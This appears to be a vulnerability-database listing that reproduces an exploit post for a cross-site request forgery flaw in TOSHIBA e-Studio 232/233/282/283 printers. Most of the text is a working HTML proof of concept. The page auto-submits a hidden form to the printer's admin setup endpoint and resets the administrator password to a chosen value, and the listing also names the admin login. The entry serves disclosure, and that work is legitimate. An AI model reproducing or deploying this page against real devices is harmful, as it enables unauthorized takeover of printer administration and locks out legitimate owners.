TOSHIBA e-Studio 232/233/282/283 - Change Admin Password CSRF Vulnerability

🗓️ 01 Jul 2014 00:00:00Reported by RootType

TOSHIBA e-Studio 232/233/282/283 - Admin Password Change CSR


                                                # Exploit Title: TOSHIBA e-Studio 232/233/282/283 Change Admin Password CSRF Vulnerability
# Date: 02.10.2013
# Exploit Author: Hubert Gradek (PL)
# Affected version: firmware T377SY0EXXX
# Tested on: TOSHIBA e-Studio 232 (T377SY0E354) / 233 (T377SY0E331)
# CVE : No CVE exists - 0day exploit



Password must be minimum 6 digits!!!
login: Admin


EXPLOIT:

&#60;html&#62;
&#60;body onload=&#34;javascript:document.forms[0].submit()&#34;&#62;
&#60;H2&#62;TOSHIBA e-Studio 232/233/282/283 Change Admin Password&#60;/H2&#62;
&#60;form name=&#34;form0&#34; action=&#34;http://[IP_ADDR]:8080/ADMIN/SETUP/Save&#34; method=&#34;post&#34;&#62;
&#60;input type=&#34;hidden&#34; name=&#34;MODE&#34; value=&#34;General&#34; /&#62;
&#60;input type=&#34;hidden&#34; name=&#34;EDTCHK&#34; value=&#34;1&#34; /&#62;
&#60;input type=&#34;hidden&#34; name=&#34;STRADMINPASS&#34; value=&#34;331337&#34; /&#62;
&#60;input type=&#34;hidden&#34; name=&#34;STRADMINPASSDUMMY&#34; value=&#34;331337&#34; /&#62;
&#60;input type=&#34;hidden&#34; name=&#34;STRCONADMINPASS&#34; value=&#34;331337&#34; /&#62;
&#60;/form&#62;
&#60;/body&#62;
&#60;/html&#62;

01 Jul 2014 00:00Current

7.1High risk

Vulners AI Score7.1